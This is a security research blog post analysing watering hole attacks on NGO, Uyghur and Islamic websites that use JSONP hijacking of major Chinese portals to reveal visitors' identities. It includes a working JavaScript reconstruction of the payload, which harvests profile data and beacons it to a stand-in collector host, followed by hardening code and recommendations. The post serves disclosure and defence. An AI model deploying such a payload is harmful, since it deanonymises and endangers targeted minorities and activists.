By: Eddie Lee and Jaime Blasco

Imagine if an authoritarian state had a tool to obtain private information about users visiting certain websites, including real names, e-mail addresses, sex, birthdays, phone numbers, etc. Imagine that even users who run TOR or VPN connections to bypass the tools the authoritarian government uses to block and monitor these websites were exposed to this technique.

In this blog post we are going to describe a series of watering hole attacks that have been targeting NGO, Uyghur and Islamic websites since at least October 2013, with the most recent attack discovered a few days ago. We want to thank Sumayah Alrwais, a PhD student in the system security lab at Indiana University, for discovering and notifying us through RSA Labs about this latest watering hole attack affecting the Chinese website of an international NGO.

A watering hole attack is a technique where the attacker wants to target a particular group (a company, an industry, an ethnic group, etc.). The attackers compromise websites used by that group and add malicious content that executes when members of the group visit the affected websites.

Typically, attackers gain access to a victim’s system by including an iframe or JavaScript file from a malicious server that exploits a vulnerability in Internet Explorer, Java, or Flash. Some examples we have documented in the past are:

In other cases we have discovered watering holes where the attackers use reconnaissance techniques to extract information about the software installed on a victim’s machine, or even a JavaScript keylogger to steal credentials:

This is also not the first time we have documented cyber espionage campaigns targeting China’s Uyghur minority:

The latest attack we are describing uses a technique we haven’t seen before in watering hole attacks. It works as follows:

The attackers compromise several Chinese-language websites associated with NGOs, Uyghur communities and Islamic associations.

The attackers modify the content of the website and include a JavaScript file from a malicious server.

The JavaScript file exploits JSONP hijacking vulnerabilities in more than 15 major Chinese websites, including the top 5 portals used in China (see table below).

Using JSONP requests, the attackers bypass the browser’s same-origin policy and collect a user’s private information if the user is logged in to one of the affected services.

The JavaScript code then sends the collected private data to an attacker-controlled server.

When we started to write this blog post we weren’t going to publish the list of affected services; however, after doing a bit of research, we found that the same vulnerabilities have been public since 2013. Details of the vulnerabilities are described in a Chinese security blog as well as on several Chinese forums.

To illustrate the severity of the issue, here is a list of Alexa rankings for the affected services and the personal data the attackers are able to steal:

JSONP is a widely used technique for making cross-domain requests from JavaScript. Instead of an XMLHttpRequest, which the same-origin policy restricts, the page loads a <script> tag whose src points at the other domain and names a callback function, and the server wraps its JSON in a call to that function. The browser sends the user’s cookies for that domain along with the script request and executes the response as code. That is exactly what makes JSONP dangerous when the response contains user data: any site, including a malicious one, can embed such a <script> tag, and if the response is customized for the logged-in user, the callback hands that user’s private data to the embedding site’s JavaScript, leaking information across origins.

Let’s look at an example from the malicious JavaScript found in one of the watering holes we analyzed.

First, the malicious JavaScript makes a JSONP request to one of the vulnerable services using a <script> tag. As you can see below, the script requests the renren_all callback:

The vulnerable site responds with the following content:

When the browser receives the data, it calls the renren_all callback function, which prepares the personal data (sex, birthday, real name and user ID) to be sent to an attacker-controlled server.

After all the JSONP requests have been made, the malicious JavaScript sends the data to an attacker-controlled server:
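The three steps above (request the callback with a <script> tag, harvest the fields inside the callback, beacon everything to the collector) can be reconstructed in a few dozen lines. The block below is an added example and is not the script recovered from the watering hole: the endpoints, the second service, the collector URL and the sample response are all made up for illustration, and only the callback name renren_all comes from the post. The offline `simulate()` helper stands in for the browser executing the script response, so the flow can be exercised outside a browser.

```javascript
// Added example, not the malicious script from the page: a minimal
// reconstruction of a JSONP-hijacking watering-hole payload.  Endpoints,
// callback names (other than renren_all) and the collector URL are assumed.

const TARGETS = [ // assumed: one entry per vulnerable service
  { service: 'renren', endpoint: 'https://portal-a.example/user/profile',
    callback: 'renren_all', fields: ['id', 'name', 'sex', 'birthday'] },
  { service: 'portal_b', endpoint: 'https://portal-b.example/api/me',
    callback: 'portalb_cb', fields: ['uid', 'email', 'phone'] },
];
const COLLECTOR = 'https://collector.example/c'; // assumed attacker server

// Everything harvested so far, keyed by service name.
const collected = {};

// Build the JSONP URL.  A <script src=...> is not subject to the same-origin
// policy, and the browser sends the victim's cookies for that domain with it.
function jsonpUrl(target) {
  const u = new URL(target.endpoint);
  u.searchParams.set('callback', target.callback);
  return u.toString();
}

// Define the global callback the portal will wrap its JSON in.  JSONP
// callbacks have to be globals because the response runs as top-level script.
function installCallback(target) {
  globalThis[target.callback] = (data) => {
    const rec = {};
    for (const f of target.fields) rec[f] = data[f];
    collected[target.service] = rec;
  };
}

// Emulate what the browser does with the response: run it as script.  In a
// real watering hole the <script> tag does this; here it lets the flow run
// end to end under Node.
function executeJsonpResponse(body) {
  new Function(body)();
}

// Exfiltration: an image beacon carries the data in the query string and
// needs no CORS permission, because the response is never read.
function exfilUrl(base, payload) {
  const u = new URL(base);
  u.searchParams.set('d', JSON.stringify(payload));
  return u.toString();
}

// Browser-only driver: one <script> per target, beacon once all have loaded.
function run() {
  if (typeof document === 'undefined') return false;
  let pending = TARGETS.length;
  for (const t of TARGETS) {
    installCallback(t);
    const s = document.createElement('script');
    s.src = jsonpUrl(t);
    s.onload = s.onerror = () => {
      if (--pending === 0) new Image().src = exfilUrl(COLLECTOR, collected);
    };
    document.head.appendChild(s);
  }
  return true;
}

// Constructed sample response, shaped like the one described in the text.
const SAMPLE_RESPONSE =
  'renren_all({"id":"1234567","name":"Zhang San","sex":"F","birthday":"1985-03-01"});';

// Offline demonstration of the same flow using the constructed response;
// returns the beacon URL the browser would request.
function simulate() {
  TARGETS.forEach(installCallback);
  executeJsonpResponse(SAMPLE_RESPONSE);
  return exfilUrl(COLLECTOR, collected);
}

run();
```

Note that nothing in the flow requires the victim to interact with the page: simply having a valid session cookie for the portal in the same browser is enough, which is why the user advice at the end of the post (do not browse sensitive sites while logged in elsewhere) matters.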

Implications for privacy and attribution

All of the watering holes we have observed target Chinese users visiting Uyghur or Islam-related websites, or NGOs sympathetic to freedom of speech. This campaign appears to be aimed at a very small group of people, and since there is no financial gain from collecting most of the leaked personal data, we can say that whoever is behind these attacks is looking to reveal the identity of the users visiting certain websites. Another point is that some of the affected websites are hosted outside of China, and the Great Firewall likely blocks some of those sites. According to The China Story Project, one of the main categories of foreign websites blocked in China is “Web pages belonging to organizations that campaign against the Communist Party or that promote Tibetan and Uyghur causes or independence for Taiwan, as well as sites belonging to the banned religious organization Falun Gong.”

In general, the Great Firewall (GFW) is able to inspect and block traffic leaving China. This is not the case when Chinese users run VPNs (Virtual Private Networks) or TOR: the GFW sees only the encrypted tunnel, not its contents or its final destination. The plaintext only emerges at the VPN or TOR exit, outside China, and there it carries the exit’s IP address rather than the user’s, so whoever observes the traffic at that point cannot tell which user is visiting a specific website.

Now imagine that the Chinese government wants to know the real identities of individuals visiting certain websites sympathetic to certain causes, of people who are exiled, or of specific people living abroad, even when they use TOR or VPNs. In the scenario we have described this is a reality, and it has been happening since 2013. Even if the only data the attackers can obtain is a user ID for a specific website, that identifier can be used to pinpoint targets for further surveillance behind the GFW.

Recommendations

First of all, the affected sites (Baidu, Taobao, etc.) should fix the JSONP hijacking vulnerabilities. There are several ways to do this:

- Require an unpredictable, per-session token in every JSONP request and reject requests that do not carry a valid one (this is the same mechanism that prevents CSRF; a value the attacker’s page can guess or fetch itself offers no protection)

- Use CORS instead of JSONP, with an explicit allow-list of origins rather than a reflected Origin header; a plain JSON response is never executed as script, so a <script> tag cannot read it

- Don’t use cookies (e.g. session identifiers) to customize JSONP responses

- Don’t include private/user data in JSONP responses
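To make the first two recommendations concrete, here is an added example (not code from any of the affected portals) of a profile endpoint written three ways as plain request/response functions, so it runs without a web server: the vulnerable JSONP handler that any third-party page can hijack, a hardened JSONP handler that demands a per-session token and a well-formed callback name, and a CORS replacement that returns plain JSON only to allow-listed origins. The session store, cookie name, token and allowed origin are all assumed values.

```javascript
// Added example, not code from any affected site: vulnerable vs. hardened
// JSONP endpoint, plus a CORS alternative.  Sessions, cookie name, token and
// allowed origin are assumptions; requests are plain objects {headers, query}.

const SESSIONS = { // assumed: session id -> per-session token and profile
  s3ss10n: {
    token: 'tok-8f2a9c',
    profile: { id: '1234567', name: 'Zhang San', sex: 'F', birthday: '1985-03-01' },
  },
};
const ALLOWED_ORIGINS = new Set(['https://app.portal.example']); // assumed
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/; // a plain identifier, nothing else

function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

function sessionFor(req) {
  const sid = parseCookies(req.headers.cookie).sid;
  return sid ? SESSIONS[sid] : undefined;
}

// VULNERABLE: any page embedding <script src=".../profile?callback=f"> gets the
// logged-in user's data.  Cookies ride along with the script request and
// nothing ties the request to the page that made it.
function vulnerableJsonp(req) {
  const cb = req.query.callback || 'callback';
  const s = sessionFor(req);
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: `${cb}(${JSON.stringify(s ? s.profile : null)});`,
  };
}

// HARDENED: require a per-session secret the attacker's page cannot know
// (the CSRF-token idea), accept only identifier-shaped callback names so the
// response cannot be turned into arbitrary script, and mark the response so
// it is not sniffed as another content type.
function hardenedJsonp(req) {
  const cb = req.query.callback || 'callback';
  if (!CALLBACK_RE.test(cb)) return { status: 400, headers: {}, body: '' };
  const s = sessionFor(req);
  if (!s || req.query.token !== s.token) return { status: 403, headers: {}, body: '' };
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/ ${cb}(${JSON.stringify(s.profile)});`,
  };
}

// CORS ALTERNATIVE: plain JSON, which a <script> tag cannot read, with
// credentials permitted only for an explicit allow-list.  Never echo an
// arbitrary Origin header back, and never combine '*' with credentials.
function corsJson(req) {
  const origin = req.headers.origin;
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return { status: 403, headers: {}, body: '' };
  const s = sessionFor(req);
  return {
    status: 200,
    headers: {
      'Access-Control-Allow-Origin': origin,
      'Access-Control-Allow-Credentials': 'true',
      Vary: 'Origin',
      'Content-Type': 'application/json',
    },
    body: JSON.stringify(s ? s.profile : null),
  };
}
```

The request a watering hole would produce is the one with a valid session cookie but no token and no Origin header (a <script> tag sends neither): the vulnerable handler returns the profile, the hardened one returns 403, and the CORS handler refuses it outright. The token must be delivered to the legitimate front end through a channel the attacker’s page cannot reach, for example embedded in the portal’s own HTML, and must never be readable from a cookie sent with cross-site requests.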

The recommendation for users is to be vigilant and follow best practices when browsing the web, especially if you live in an authoritarian country or are worried about being tracked. For example, do not browse sensitive websites while logged in to another website, even in a different tab or window; log out first, or use a separate browser profile.

It is really important to understand the difference between anonymity and privacy. For instance, if you are using TOR or a VPN service that encrypts your communications, it will give you a certain level of privacy, but your anonymity is still at risk. Anonymity is the idea of being “non-identifiable” or untrackable, but as we have described in this blog post, it is hard to remain anonymous if you are logged in to services where you have revealed personal information while browsing other sites that can exploit vulnerabilities to access that information.

[Update: 06/15/2015]

We would like to thank Citizen Lab for helping us with victim notification. We also want to point out that every TOR user should be using the TOR Browser, which is better suited to browsing the web and helps prevent this kind of attack and other privacy-related issues.